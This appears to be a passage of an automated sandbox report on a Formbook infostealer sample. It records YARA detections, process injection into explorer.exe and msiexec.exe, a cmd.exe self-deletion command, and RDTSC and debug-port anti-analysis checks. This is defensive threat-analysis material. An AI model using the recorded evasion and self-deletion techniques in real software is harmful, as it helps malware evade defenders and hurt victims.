          Source: 3.1.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 3.2.RCS76393.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: classification engineClassification label: mal100.troj.evad.winEXE@7/0@12/8
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6864:120:WilError_01
          Source: RCS76393.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\RCS76393.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\RCS76393.exeProcess created: C:\Users\user\Desktop\RCS76393.exe 'C:\Users\user\Desktop\RCS76393.exe' Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RCS76393.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: Binary string: msiexec.pdb source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp
          Source: Binary string: msiexec.pdbGCTL source: RCS76393.exe, 00000003.00000002.363009374.0000000000D80000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: RCS76393.exe, 00000003.00000002.362641926.0000000000AEF000.00000040.00000001.sdmp, msiexec.exe, 00000007.00000002.588142042.0000000004560000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: RCS76393.exe, msiexec.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000005.00000000.348166321.000000000DC20000.00000002.00000001.sdmp

          Data Obfuscation:

          barindex
          Detected unpacking (changes PE section rights)Show sources
          Source: C:\Users\user\Desktop\RCS76393.exeUnpacked PE file: 3.2.RCS76393.exe.400000.0.unpack .text:ER;.data:W;.jidiy:W;.wahe:W;.new:R;.rsrc:R;.reloc:R; vs .text:ER;
          Source: RCS76393.exeStatic PE information: section name: .jidiy
          Source: RCS76393.exeStatic PE information: section name: .wahe
          Source: RCS76393.exeStatic PE information: section name: .new
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00416257 push ebx; retf 3_2_00416259
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004072E3 push esp; retf 3_2_004072EF
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B3B5 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B46C push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B402 push eax; ret 3_2_0041B408
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_0041B40B push eax; ret 3_2_0041B472
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415FDB push es; iretd 3_2_00415FE2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00415F86 push ds; retf 3_2_00415F87
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A4D0D1 push ecx; ret 3_2_00A4D0E4
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_00416257 push ebx; retf 3_1_00416259
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_1_004072E3 push esp; retf 3_1_004072EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_045DD0D1 push ecx; ret 7_2_045DD0E4
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB3B5 push eax; ret 7_2_030BB408
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B6257 push ebx; retf 7_2_030B6259
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030A72E3 push esp; retf 7_2_030A72EF
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5F86 push ds; retf 7_2_030B5F87
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030B5FDB push es; iretd 7_2_030B5FE2
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB40B push eax; ret 7_2_030BB472
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB402 push eax; ret 7_2_030BB408
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 7_2_030BB46C push eax; ret 7_2_030BB472
          Source: initial sampleStatic PE information: section name: .text entropy: 7.49545295007
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\Desktop\RCS76393.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exeRDTSC instruction interceptor: First address: 000000000040897E second address: 0000000000408984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000030A85E4 second address: 00000000030A85EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msiexec.exeRDTSC instruction interceptor: First address: 00000000030A897E second address: 00000000030A8984 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Windows\explorer.exe TID: 6280Thread sleep time: -45000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 7148Thread sleep time: -52000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\msiexec.exeLast function: Thread delayed
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
          Source: explorer.exe, 00000005.00000000.346305900.0000000008540000.00000004.00000001.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.345328681.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.340676786.00000000063F6000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000005.00000000.344732574.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.345500910.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
          Source: explorer.exe, 00000005.00000000.339421845.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: explorer.exe, 00000005.00000000.329599785.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
          Source: C:\Users\user\Desktop\RCS76393.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\RCS76393.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_004088B0 rdtsc 3_2_004088B0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00409B20 LdrLoadDll,3_2_00409B20
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A220A0 mov eax, dword ptr fs:[00000030h]3_2_00A220A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A390AF mov eax, dword ptr fs:[00000030h]3_2_00A390AF
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov ecx, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2F0BF mov eax, dword ptr fs:[00000030h]3_2_00A2F0BF
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9080 mov eax, dword ptr fs:[00000030h]3_2_009F9080
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]3_2_00A73884
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A73884 mov eax, dword ptr fs:[00000030h]3_2_00A73884
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F58EC mov eax, dword ptr fs:[00000030h]3_2_009F58EC
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov ecx, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A8B8D0 mov eax, dword ptr fs:[00000030h]3_2_00A8B8D0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0B02A mov eax, dword ptr fs:[00000030h]3_2_00A0B02A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2002D mov eax, dword ptr fs:[00000030h]3_2_00A2002D
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A77016 mov eax, dword ptr fs:[00000030h]3_2_00A77016
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]3_2_00AC4015
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC4015 mov eax, dword ptr fs:[00000030h]3_2_00AC4015
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB2073 mov eax, dword ptr fs:[00000030h]3_2_00AB2073
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC1074 mov eax, dword ptr fs:[00000030h]3_2_00AC1074
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]3_2_00A10050
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A10050 mov eax, dword ptr fs:[00000030h]3_2_00A10050
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A769A6 mov eax, dword ptr fs:[00000030h]3_2_00A769A6
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]3_2_00A261A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A261A0 mov eax, dword ptr fs:[00000030h]3_2_00A261A0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A751BE mov eax, dword ptr fs:[00000030h]3_2_00A751BE
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1C182 mov eax, dword ptr fs:[00000030h]3_2_00A1C182
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2A185 mov eax, dword ptr fs:[00000030h]3_2_00A2A185
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22990 mov eax, dword ptr fs:[00000030h]3_2_00A22990
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A841E8 mov eax, dword ptr fs:[00000030h]3_2_00A841E8
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB1E1 mov eax, dword ptr fs:[00000030h]3_2_009FB1E1
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov eax, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A14120 mov ecx, dword ptr fs:[00000030h]3_2_00A14120
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]3_2_00A2513A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2513A mov eax, dword ptr fs:[00000030h]3_2_00A2513A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9100 mov eax, dword ptr fs:[00000030h]3_2_009F9100
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]3_2_00A1B944
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1B944 mov eax, dword ptr fs:[00000030h]3_2_00A1B944
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]3_2_009FB171
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FB171 mov eax, dword ptr fs:[00000030h]3_2_009FB171
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FC962 mov eax, dword ptr fs:[00000030h]3_2_009FC962
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A0AAB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A0AAB0 mov eax, dword ptr fs:[00000030h]3_2_00A0AAB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2FAB0 mov eax, dword ptr fs:[00000030h]3_2_00A2FAB0
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]3_2_00A2D294
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2D294 mov eax, dword ptr fs:[00000030h]3_2_00A2D294
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F52A5 mov eax, dword ptr fs:[00000030h]3_2_009F52A5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22AE4 mov eax, dword ptr fs:[00000030h]3_2_00A22AE4
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22ACB mov eax, dword ptr fs:[00000030h]3_2_00A22ACB
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FAA16 mov eax, dword ptr fs:[00000030h]3_2_009FAA16
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A34A2C mov eax, dword ptr fs:[00000030h]3_2_00A34A2C
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov ecx, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F5210 mov eax, dword ptr fs:[00000030h]3_2_009F5210
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A08A0A mov eax, dword ptr fs:[00000030h]3_2_00A08A0A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A13A1C mov eax, dword ptr fs:[00000030h]3_2_00A13A1C
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAB260 mov eax, dword ptr fs:[00000030h]3_2_00AAB260
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC8A62 mov eax, dword ptr fs:[00000030h]3_2_00AC8A62
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A3927A mov eax, dword ptr fs:[00000030h]3_2_00A3927A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009F9240 mov eax, dword ptr fs:[00000030h]3_2_009F9240
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00ABEA55 mov eax, dword ptr fs:[00000030h]3_2_00ABEA55
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A84257 mov eax, dword ptr fs:[00000030h]3_2_00A84257
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AC5BA5 mov eax, dword ptr fs:[00000030h]3_2_00AC5BA5
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A24BAD mov eax, dword ptr fs:[00000030h]3_2_00A24BAD
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB138A mov eax, dword ptr fs:[00000030h]3_2_00AB138A
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AAD380 mov ecx, dword ptr fs:[00000030h]3_2_00AAD380
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A01B8F mov eax, dword ptr fs:[00000030h]3_2_00A01B8F
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A2B390 mov eax, dword ptr fs:[00000030h]3_2_00A2B390
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A22397 mov eax, dword ptr fs:[00000030h]3_2_00A22397
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A203E2 mov eax, dword ptr fs:[00000030h]3_2_00A203E2
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A1DBE9 mov eax, dword ptr fs:[00000030h]3_2_00A1DBE9
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00A753CA mov eax, dword ptr fs:[00000030h]3_2_00A753CA
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_00AB131B mov eax, dword ptr fs:[00000030h]3_2_00AB131B
          Source: C:\Users\user\Desktop\RCS76393.exeCode function: 3_2_009FF358 mov eax, dword ptr fs:[00000030h]3_2_009FF358
